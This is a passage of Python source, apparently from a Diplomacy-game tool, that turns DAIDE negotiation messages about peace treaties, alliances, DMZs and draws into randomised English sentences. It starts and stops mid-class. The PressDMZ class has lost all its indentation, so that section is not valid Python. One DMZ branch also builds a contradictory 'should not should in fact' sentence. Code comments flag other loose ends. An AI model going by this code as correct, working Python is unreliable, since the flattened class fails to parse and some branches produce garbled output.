                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (YES (PRP (NOT (PCE
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['break', 'cancel', 'annul']) + ' ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (REJ (PRP (NOT (PCE
                elif self.container.container.container.operator == 'REJ':
                    # Two phrasings of the same rejection, picked at random.
                    if random.choice([True, False]):
                        self.english = 'I ' + random.choice(['disagree', 'reject']) + ' that ' + \
                            helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + \
                            ' should ' + random.choice(['break', 'cancel', 'annul']) + ' ' + \
                            helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
                            random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                    else:
                        self.english = 'No, ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                            random.choice(['should not', 'cannot', 'ought not']) + ' ' + random.choice(['break', 'cancel', 'annul']) + ' ' + \
                            helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
                            random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (CCL (PRP (NOT (PCE
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['break', 'cancel', 'annul']) + ' ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (HUH (PRP (NOT (PCE
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about a peace treaty.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NOT (PCE
                if self.container.container.container is None:
                    self.english = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['are not in a current', 'do not have a current', 'are not in an active', 'do not have an active', 'are not in a', 'do not have a']) + ' ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (HUH (FCT (NOT (PCE
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a peace treaty.'
        elif self.container.operator == 'NAR':
            if self.container.container.operator == 'PRP':
                # (PRP (NAR (PCE
                if self.container.container.container is None:
                    self.english = 'I ' + random.choice(['propose', 'request']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' not ' + \
                        random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (YES (PRP (NAR (PCE
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' not ' + \
                        random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (REJ (PRP (NAR (PCE
                elif self.container.container.container.operator == 'REJ':
                    self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + \
                        ' should in fact ' + random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (CCL (PRP (NAR (PCE
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + \
                        ' avoid ' + random.choice(['forming', 'signing', 'agreeing to', 'establishing']) + ' a ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (HUH (PRP (NAR (PCE
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about a peace treaty.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NAR (PCE
                if self.container.container.container is None:
                    self.english = 'It is unclear if ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['are in a', 'have a']) + ' ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
                # (HUH (FCT (NAR (PCE
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a peace treaty.'
        elif self.container.operator == 'FCT':
            # (FCT (PCE
            if self.container.container is None:
                self.english = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                    random.choice(['are in a', 'have a']) + ' ' + \
                    random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
            # (HUH (FCT (PCE
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your statement about a peace treaty.'
        else:
            # Unrecognized container: fall back to the context-free phrasing.
            self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates a simple English statement about this peace deal, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
        :return: the simple English statement
        :rtype: str
        """
        self.simpleenglish = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
            random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
            random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message, e.g. 'PCE (ENG FRA)'.
        :return: the DAIDE message
        :rtype: str
        """
        return 'PCE (' + ' '.join(self.allies) + ')'
class PressAlliance(PressMessage):
    """ The game-related content of an alliance (DAIDE ALY ... VSS ...). """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE: invent allies/opponents at random.  2-in-3 chance the
            # alliance covers the conversation participants; otherwise a random sample.
            self.operator = 'ALY'
            if random.choice([True, True, False]):
                self.allies = [curpower for curpower in helpers.powerlist if curpower in utterance.topowers or curpower == utterance.frompower]
                opplist = [curpower for curpower in helpers.powerlist if curpower not in self.allies]
                self.opponents = random.sample(opplist, random.randint(1, min(3, len(opplist))))
            else:
                self.allies = random.sample(helpers.powerlist, random.randint(2, 3))
                opplist = [curpower for curpower in helpers.powerlist if curpower not in self.allies and curpower != utterance.frompower]
                self.opponents = random.sample(opplist, random.randint(1, min(3, len(opplist))))
        elif len(thelists) == 4:
            # thelists is [operator, allies, <separator>, opponents];
            # thelists[2] (presumably the 'VSS' token) is intentionally skipped.
            self.operator = thelists[0]
            self.allies = thelists[1]
            self.opponents = thelists[3]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the alliance in the context of a sender, recipients and desired tone.

        The wording is chosen by inspecting the chain of containing messages
        (e.g. ALY inside PRP inside YES reads as agreement to a proposed alliance),
        with random synonym choices for variety.
        NOTE(review): if no branch matches, self.english may keep a stale value —
        confirm every reachable container chain is covered.

        :return: the English expression
        :rtype: str
        """
        if self.container.operator == 'PRP':
            # (PRP (ALY
            if self.container.container is None:
                if random.choice([True, False]):
                    self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
                        ' ' + random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
                        ' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + \
                        ' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                else:
                    self.english = 'I ' + random.choice(['propose', 'request']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['form', 'sign', 'agree to', 'establish']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
                        ' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
            # (YES (PRP (ALY
            elif self.container.container.operator == 'YES':
                self.english = 'I ' + random.choice(['agree to', 'concur with', 'would appreciate']) + ' ' + \
                    random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
                    ' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + \
                    ' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
            # (REJ (PRP (ALY
            elif self.container.container.operator == 'REJ':
                self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of']) + ' ' + \
                    random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
                    ' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + \
                    ' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
            # (CCL (PRP (ALY
            elif self.container.container.operator == 'CCL':
                self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of ' + \
                    random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + \
                    ' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + \
                    ' against ' + helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
            # (HUH (PRP (ALY
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your alliance proposal.'
        elif self.container.operator == 'NOT':
            if self.container.container.operator == 'PRP':
                # (PRP (NOT (ALY
                if self.container.container.container is None:
                    self.english = 'I ' + random.choice(['propose', 'request', 'demand']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' not ' + \
                        random.choice(['form', 'sign', 'agree to']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (YES (PRP (NOT (ALY
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
                        random.choice(['form', 'sign', 'agree to']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (REJ (PRP (NOT (ALY
                elif self.container.container.container.operator == 'REJ':
                    # Two phrasings of the same rejection, picked at random.
                    if random.choice([True, False]):
                        self.english = 'I ' + random.choice(['disagree', 'reject']) + ' that ' + \
                            helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
                            random.choice(['form', 'sign', 'agree to']) + ' ' + \
                            random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                            helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                    else:
                        self.english = 'No, ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                            random.choice(['should be free to', 'should not be stopped from', 'should not be prevented from']) + ' ' + \
                            random.choice(['forming', 'signing', 'agreeing to']) + ' ' + \
                            random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                            helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (CCL (PRP (NOT (ALY
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['form', 'sign', 'agree to']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (HUH (PRP (NOT (ALY
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about an alliance.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NOT (ALY
                if self.container.container.container is None:
                    self.english = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['are not in', 'do not have']) + ' ' + \
                        random.choice(['a current', 'an active', 'a']) + ' ' + \
                        random.choice(['alliance', 'joint military operation', 'military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                    # Patch up the article when the random choices produced 'a alliance'.
                    self.english = self.english.replace(' a alliance', ' an alliance')
                # (HUH (FCT (NOT (ALY
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about an alliance.'
        elif self.container.operator == 'NAR':
            if self.container.container.operator == 'PRP':
                # (PRP (NAR (ALY
                if self.container.container.container is None:
                    self.english = 'I ' + random.choice(['doubt', 'don\'t think', 'do not think']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should ' + \
                        random.choice(['form', 'sign', 'agree to']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (YES (PRP (NAR (ALY
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
                        random.choice(['form', 'sign', 'agree to']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (REJ (PRP (NAR (ALY
                elif self.container.container.container.operator == 'REJ':
                    self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + \
                        ' should in fact be able to ' + random.choice(['form', 'sign', 'agree to', 'establish']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (CCL (PRP (NAR (ALY
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
                        random.choice(['form', 'sign', 'agree to']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (HUH (PRP (NAR (ALY
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about an alliance.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NAR (ALY
                if self.container.container.container is None:
                    self.english = 'It is unclear if ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['are in', 'have']) + ' ' + \
                        random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                        helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
                # (HUH (FCT (NAR (ALY
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about an alliance.'
        elif self.container.operator == 'FCT':
            # (FCT (ALY
            if self.container.container is None:
                self.english = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                    random.choice(['are in', 'have']) + ' ' + \
                    random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
                    helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
            # (HUH (FCT (ALY
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your statement about an alliance.'
        else:
            # Unrecognized container: fall back to the context-free phrasing.
            self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates a simple English statement about this alliance, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
        :return: the simple English statement
        :rtype: str
        """
        self.simpleenglish = helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
            random.choice(['form', 'sign', 'agree to', 'establish']) + ' ' + \
            random.choice(['an alliance', 'a joint military operation', 'military cooperation', 'a military coalition']) + ' against ' + \
            helpers.listOfPowers(self.opponents, self.utterance.frompower, self.utterance.topowers) + '.'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message, e.g. 'ALY (ENG FRA) VSS (GER)'.
        :return: the DAIDE message
        :rtype: str
        """
        return 'ALY (' + ' '.join(self.allies) + ') VSS (' + ' '.join(self.opponents) + ')'
class PressDMZ(PressMessage):
""" The game-related content of a DMZ. """
def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
    """
    Initialize the DMZ message from a parsed DAIDE statement.

    :param utterance: the press utterance that this message is within the content for
    :type utterance: PressUtterance
    :param container: the press message that contains this one
    :type container: PressMessage
    :param thelists: the parsed, nested DAIDE statement
    :type thelists: []
    """
    super().__init__(utterance, container)
    if not thelists:
        # No parsed DAIDE: invent the zone at random.  2-in-3 chance the DMZ
        # covers exactly the conversation participants; otherwise 1-3 random powers.
        self.operator = 'DMZ'
        if random.choice([True, True, False]):
            self.powers = [power for power in helpers.powerlist
                           if power in utterance.topowers or power == utterance.frompower]
        else:
            self.powers = random.sample(helpers.powerlist, random.randint(1, 3))
        self.provinces = random.sample(helpers.provincelist, random.randint(1, 3))
    elif len(thelists) == 3:
        # thelists is [operator, power list, province list].
        self.operator, self.powers, self.provinces = thelists
def formenglish(self): # type () -> str
"""
Creates an English expression about the DMZ in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
powersgloss = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers)
provincesgloss = helpers.listOfProvinces(self.provinces)
if self.container.operator == 'PRP':
# (PRP (DMZ
if self.container.container is None:
if 'you ' in powersgloss.lower() and 'and me' in powersgloss.lower():
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
' we ' + random.choice(['stay out of', 'create a DMZ in', 'create a demilitarized zone in', 'keep out of']) + ' ' + \
provincesgloss + '.'
else:
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' that ' + \
powersgloss + ' ' + random.choice(['stay out of', 'create a DMZ in', 'create a demilitarized zone', 'keep out of']) + ' ' + \
provincesgloss + '.'
# (YES (PRP (DMZ
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with']) + ' ' + \
random.choice(['a DMZ in', 'a demilitarized zone in', 'keeping out of', 'staying out of']) + ' ' + \
provincesgloss + ', covering ' + powersgloss + '.'
# (REJ (PRP (DMZ
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of']) + ' ' + \
random.choice(['a DMZ in', 'a demilitarized zone in', 'keeping out of', 'staying out of']) + ' ' + \
provincesgloss + '.'
# (CCL (PRP (DMZ
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of ' + \
random.choice(['a DMZ in', 'a demilitarized zone in']) + ' ' + \
provincesgloss + '.'
# (HUH (PRP (DMZ
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your DMZ proposal.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (DMZ
if self.container.container.container is None:
if random.choice([True, False]):
self.english = 'I ' + random.choice(['propose', 'request', 'demand']) + ' that ' + \
powersgloss + ' have free movement into and through ' + \
provincesgloss + '.'
else:
self.english = 'I ' + random.choice(['propose', 'request', 'demand']) + ' that no ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' exist in ' + \
provincesgloss + '.'
# (YES (PRP (NOT (DMZ
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
powersgloss + ' have free movement into and through ' + \
provincesgloss + '.'
# (REJ (PRP (NOT (DMZ
elif self.container.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['disagree with', 'reject']) + ' free movement into and through ' + \
provincesgloss + ' for ' + powersgloss + '.'
# (CCL (PRP (NOT (DMZ
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
provincesgloss + ' not enjoy a ' + random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + \
' with respect to ' + powersgloss + '.'
# (HUH (PRP (NOT (DMZ
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a DMZ.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (DMZ
if self.container.container.container is None:
self.english = powersgloss + ' ' + \
random.choice(['are not in', 'do not respect', 'do not have']) + ' ' + \
random.choice(['a current', 'an active', 'a']) + ' ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (HUH (FCT (NOT (DMZ
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a DMZ.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (DMZ
if self.container.container.container is None:
self.english = 'I ' + random.choice(['doubt', 'don\'t think', 'do not think']) + ' that ' + \
helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should ' + \
random.choice(['form', 'sign', 'agree to']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (YES (PRP (NAR (DMZ
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that ' + \
helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
random.choice(['form', 'sign', 'agree to']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (REJ (PRP (NAR (DMZ
elif self.container.container.container.operator == 'REJ':
self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that ' + \
helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
' should in fact be able to ' + random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (CCL (PRP (NAR (DMZ
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' should not ' + \
random.choice(['form', 'sign', 'agree to']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (HUH (PRP (NAR (DMZ
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a DMZ.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (DMZ
if self.container.container.container is None:
self.english = 'It is unclear if ' + helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are in', 'have']) + ' a ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (HUH (FCT (NAR (DMZ
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a DMZ.'
elif self.container.operator == 'FCT':
# (FCT (DMZ
if self.container.container is None:
self.english = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
random.choice(['are in', 'have']) + ' ' + \
random.choice(['DMZ', 'demilitarized zone', 'safe zone']) + ' in ' + \
provincesgloss + '.'
# (HUH (FCT (DMZ
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a DMZ.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the DMZ in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' form a DMZ in ' + helpers.listOfProvinces(self.provinces) + '.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'DMZ (' + ' '.join(self.powers) + ') (' + ' '.join(self.provinces) + ')'
class PressDraw(PressMessage):
    """ The game-related content of a draw. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: invent a random draw for generation.
            self.operator = 'DRW'
            if random.choice([True, True, False]):
                # Bias (2-in-3) toward a draw among the conversation participants.
                self.powers = [curpower for curpower in helpers.powerlist if curpower in utterance.topowers or curpower == utterance.frompower]
            else:
                # A DRW with no power list is a draw among all surviving powers.
                self.powers = None
            # NOTE(review): provinces is never read anywhere in this class -- it looks
            # like a copy-paste leftover from PressDMZ; kept to avoid changing state shape.
            self.provinces = random.sample(helpers.provincelist, random.randint(1, 3))
        else:
            self.operator = thelists[0]
            if len(thelists) > 1:
                self.powers = thelists[1]
            else:
                self.powers = None
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the draw in the context of a sender, recipients and desired tone.
        The wording is chosen from the chain of containing operators (PRP/NOT/NAR/FCT, wrapped by YES/REJ/CCL/HUH).
        :return: the English expression
        :rtype: str
        """
        powersgloss = ''
        # BUGFIX: the default was assigned to a misspelled name ('subjpowersgloxx'),
        # leaving subjpowersgloss with no defined default when self.powers is None.
        subjpowersgloss = ''
        if self.powers is not None:
            powersgloss = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers)
            subjpowersgloss = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective')
        if self.container.operator == 'PRP':
            # (PRP (DRW
            if self.container.container is None:
                if self.powers is None:
                    self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' we pursue a draw.'
                else:
                    self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' we pursue a draw between ' + powersgloss + '.'
            # (YES (PRP (DRW
            elif self.container.container.operator == 'YES':
                if self.powers is None:
                    self.english = 'I ' + random.choice(['agree to', 'concur with']) + ' pursuing a draw.'
                else:
                    self.english = 'I ' + random.choice(['agree to', 'concur with']) + ' pursuing a draw between ' + powersgloss + '.'
            # (REJ (PRP (DRW
            elif self.container.container.operator == 'REJ':
                if self.powers is None:
                    self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not agree to']) + ' pursuing a draw.'
                else:
                    self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not agree to']) + ' pursuing a draw between ' + powersgloss + '.'
            # (CCL (PRP (DRW
            elif self.container.container.operator == 'CCL':
                if self.powers is None:
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a draw.'
                else:
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a draw between ' + powersgloss + '.'
            # (HUH (PRP (DRW
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your draw proposal.'
        elif self.container.operator == 'NOT':
            if self.container.container.operator == 'PRP':
                # (PRP (NOT (DRW
                if self.container.container.container is None:
                    if self.powers is None:
                        self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' we do not pursue a draw.'
                    else:
                        self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' we do not pursue a draw between ' + powersgloss + '.'
                # (YES (PRP (NOT (DRW
                elif self.container.container.container.operator == 'YES':
                    if self.powers is None:
                        self.english = 'I ' + random.choice(['agree that', 'concur that']) + ' we should not pursue a draw.'
                    else:
                        self.english = 'I ' + random.choice(['agree that', 'concur that']) + ' we should not pursue a draw between ' + powersgloss + '.'
